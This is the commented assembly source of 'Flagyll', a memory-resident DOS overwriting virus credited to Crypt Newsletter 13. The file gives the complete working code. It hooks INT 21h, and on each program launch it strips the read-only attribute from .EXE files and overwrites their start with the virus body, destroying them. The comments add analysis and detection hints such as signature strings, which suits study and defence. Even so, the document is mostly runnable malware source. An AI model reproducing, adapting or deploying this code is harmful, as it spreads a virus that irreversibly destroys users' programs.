OneHalf  Virii

FLAGYLL

; --------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
; --------------------------------------------------------------------------

; Assembler directives and equates (MASM syntax, 16-bit real-mode DOS).
; .radix 16 makes every unsuffixed numeric literal in this file hexadecimal
; (so "sub ax,100" is 100h, "mov ah,40" is 40h, "5a" is 5Ah).
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg

; .COM-style image: code starts at offset 100h, directly after the PSP.
org 100h

; Storage placed just past the code body. It lies beyond filelength, so it
; exists only in the memory-resident copy and is never part of a written file.
oi21 equ endflagyll                 ; dword: saved original INT 21h vector (offset, segment)
filelength equ endflagyll - begin   ; byte length of the body that infect writes into targets
nameptr equ endflagyll+4            ; dword: far pointer to the program name passed to EXEC
DTA equ endflagyll+8                ; scratch Disk Transfer Area used while infecting

; Entry point (see "end begin"): go straight to the installer.
begin: jmp install_flagyll



;-----------------------------------------------------------------------
; install_flagyll - make the body memory-resident and hook INT 21h.
; Reached from the entry jmp at begin.
; In:   cs = es = PSP segment of the running carrier (as DOS sets up
;       a .COM load; the code assumes es == cs below)
; Steps visible below:
;   1. Look at the MCB one paragraph below the PSP and require its
;      signature byte to be 'Z' (5Ah, last block in the chain).
;   2. Shrink that block by 100h paragraphs (4 KB) by editing its size
;      field, then copy the body to the start of the released space.
;   3. If INT 21h does not already point at check_exec (offset compared
;      only), save the current vector after the copy (oi21) and set
;      INT 21h to the copy's check_exec via AH=25h.
; Out:  ret. With the stack DOS builds for a .COM this presumably lands
;       on the INT 20h at PSP:0, so the carrier simply terminates; no
;       host program is run.
; Clobbers: ax, bx, cx, si, di, dx, ds, es, flags
;-----------------------------------------------------------------------
install_flagyll:

mov ax,cs
dec ax
mov ds,ax                               ; ds = segment of this program's MCB (PSP - 1)
cmp byte ptr ds:[0000],5a               ; MCB signature byte: 5Ah = 'Z' (last block in chain)
jne cancel                              ; not the last block -> do nothing
mov ax,ds:[0003]                        ; MCB size field, in paragraphs
sub ax,100                              ; 100h paragraphs = 4 KB (.radix 16 in effect)
mov ds:0003,ax                          ; block now ends 4 KB earlier; that space is no longer in the MCB chain


copy_flagyll:
mov bx,ax                               ; bx = new block size in paragraphs
mov ax,es
add ax,bx
mov es,ax                               ; es = PSP + new size = first paragraph of the released 4 KB
mov cx,offset endflagyll - begin        ; byte count of the body
mov ax,ds
inc ax
mov ds,ax                               ; ds = MCB + 1 = PSP / code segment
lea si,ds:[begin]
lea di,es:0100                          ; copy keeps the 100h offset so every label is valid in the copy
rep movsb                               ; leaves cx = 0, which hook_21 relies on



hook_21:

mov ds,cx                               ; cx == 0 after rep movsb: ds = interrupt vector table
mov si,0084h ; 21h * 4 = offset of the INT 21h vector in the IVT
mov di,offset oi21                      ; es:di = save slot right after the copied body
mov dx,offset check_exec
lodsw                                   ; ax = current INT 21h handler offset
cmp ax,dx ; already the check_exec offset -> treated as "already resident"
je cancel
stosw                                   ; save original handler offset to oi21
movsw                                   ; save original handler segment to oi21+2

push es
pop ds                                  ; ds:dx = resident copy : check_exec
mov ax,2521h                            ; DOS: set interrupt vector 21h to ds:dx
int 21h

cancel: ret                             ; .COM return -> PSP:0 (INT 20h); the carrier ends here

;-----------------------------------------------------------------------
; check_exec - the installed INT 21h handler (resident copy).
; Entry: any INT 21h request; ax = function/subfunction, ds:dx as the
;        caller set it (for AX=4B00h that is the ASCIIZ program name).
; Behaviour visible below: flags and es/ds/ax/bx/dx are saved, only
; AX=4B00h (EXEC, load and execute) calls infect, and every request is
; then forwarded by jumping through the saved vector in oi21.
; Clobbers seen by the intercepted caller: cx, si, di (used by infect
; and not saved here).
; Detection angle: after installation the INT 21h vector points into a
; 4 KB block just above the last MCB rather than into DOS.
;-----------------------------------------------------------------------
check_exec: ; set as the INT 21h vector by install_flagyll (AX=2521h)
pushf

push es
push ds
push ax
push bx
push dx

cmp ax,04B00h                           ; DOS EXEC, AL=0: load and execute a program
; only an EXEC request is acted on; every other function is passed straight through


jne abort

do_infect:
call infect                             ; ds:dx = ASCIIZ path of the program about to be launched
abort:
pop dx
pop bx
pop ax
pop ds
pop es
popf

exit:
jmp dword ptr cs:[oi21]                 ; chain to the original INT 21h handler saved at install time

;-----------------------------------------------------------------------
; infect - called from check_exec for every EXEC (AX=4B00h) request.
; In:   ds:dx = ASCIIZ path of the program being launched
;       cs    = segment of the resident copy
; What the code below does, in order:
;   * stores ds:dx in name_seg/name_off and again in nameptr
;   * saves the caller's DTA (AH=2Fh) and switches to its own (AH=1Ah)
;   * host_ident points at the 3-byte extension; "COM" -> skip,
;     anything other than "EXE" -> skip (uppercase compare only)
;   * for an EXE: clear the read-only attribute (AH=43h), open for
;     read/write (AX=3D02h), seek to offset 0 (AX=4200h) and write
;     filelength bytes from cs:100h (the resident body) over the start
;     of the file. The original header is destroyed: this is a plain
;     overwriter with no host preservation, no stealth, and no
;     restoration of attributes, size or timestamp.
;   * close the handle and terminate the current process with AX=4C00h,
;     presumably the program that issued the EXEC; the requested launch
;     never completes and the caller's DTA is not restored on this path.
; The skip path (return) restores the caller's DTA and returns to
; check_exec, which forwards the EXEC normally.
; Static strings present in the body ('-=[Crypt Newsletter 13]=-' here,
; 'Flagyll' in note2) are usable as file signatures.
;-----------------------------------------------------------------------
infect:
jmp over_id                             ; step over the embedded text
note: db '-=[Crypt Newsletter 13]=-'   ; inert identification string (signature candidate)


over_id:



mov cs:[name_seg],ds
mov cs:[name_off],dx                    ; far pointer to the ASCIIZ name of the program being run
; the same pointer is kept in nameptr (beyond the code image) for host_ident
cld ; clear direction flag: the string ops below walk upward
mov word ptr cs:[nameptr],dx
mov word ptr cs:[nameptr+2],ds

mov ah,2Fh                              ; DOS: get current DTA -> es:bx
int 21h
push es
push bx                                 ; kept so "return" can restore the caller's DTA

push cs

pop ds
mov dx,offset DTA                       ; own scratch DTA located past the body
mov ah,1Ah                              ; DOS: set DTA = ds:dx
int 21h

call host_ident                         ; es:di -> the 3 extension characters of the name
push di
mov si,offset COM_txt

mov cx,3
rep cmpsb                               ; ds:si "COM" against es:di
pop di
jz return                               ; COM files are left alone
mov si,offset EXE_txt
nop
mov cl,3                                ; cx back to 3 (ch is already 0 since cx was at most 3)
rep cmpsb
jnz return                              ; not "EXE" either -> leave the file untouched



do_exe:

mov ax,4300h                            ; DOS: get file attributes -> cx
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh                             ; clear bit 0 = read-only
mov ax,4301h                            ; DOS: set file attributes from cx (never reverted)
int 21h

mov ds,cs:[name_seg]
mov dx,cs:[name_off]
mov ax,3D02h                            ; DOS: open file, read/write access
int 21h
jc close_file                           ; open failed: control still reaches the close and the terminate below
push cs
pop ds
mov [handle],ax
mov bx,ax

push cs
pop ds
mov ax,4200h                            ; DOS: lseek relative to start of file

push cs
pop ds
mov bx,[handle]
xor cx,cx
xor dx,dx                               ; cx:dx = 0 -> file offset 0
int 21h



mov ah,40                               ; 40h under .radix 16: DOS write to handle
mov cx,filelength                       ; byte count = size of the body
mov dx,100                              ; ds:dx = cs:100h, the resident body
int 21h                                 ; the target's first filelength bytes are now the body

close_file: mov bx,[handle]
mov ah,03Eh                             ; DOS: close handle
int 21h

mov ax,4C00h                            ; DOS: terminate process, exit code 0
int 21h                                 ; does not return; the EXEC request is never forwarded




return: mov ah,1Ah                      ; DOS: set DTA
pop dx
pop ds                                  ; ds:dx = the DTA saved at entry (pushed as es then bx)
int 21H

ret                                     ; back to check_exec, which forwards the EXEC

;-----------------------------------------------------------------------
; host_ident - locate the extension of the name stored in nameptr.
; In:   cs:[nameptr] = far pointer to an ASCIIZ path
; Out:  es:di -> 4 bytes before the position just past the terminating
;       0, i.e. the 3 extension characters when the name ends in ".xxx"
; Clobbers: al, cx (ch forced to FFh as the scan limit, cl left as is),
;           es, di, flags
; Note: the position is taken from the terminator alone; the code does
;       not look for a '.'.
;-----------------------------------------------------------------------
host_ident: les di,dword ptr cs:[nameptr]
mov ch,0FFh                             ; cx >= FF00h: scan count large enough for any DOS path
mov al,0                                ; search for the terminating 0
repnz scasb                             ; di ends one past the 0
sub di,4                                ; back up over the 0 and the 3-character extension
ret
EXE_txt db 'EXE',0                      ; extension that infect overwrites (uppercase compare only)
COM_txt db 'COM',0                      ; extension that infect skips

; scratch words, written through cs: by infect
name_seg dw ?                           ; segment of the program name passed to EXEC
name_off dw ?                           ; offset of that name
handle dw ?                             ; DOS file handle of the opened target

note2: db 'Flagyll'                     ; inert name string (signature candidate)

; End of the body that is copied to memory and written into targets.
; The saved vector (oi21), nameptr and the scratch DTA defined by the
; equates start here and exist only in the resident copy, never on disk.
endflagyll:

cseg ends
end begin                               ; program entry point = begin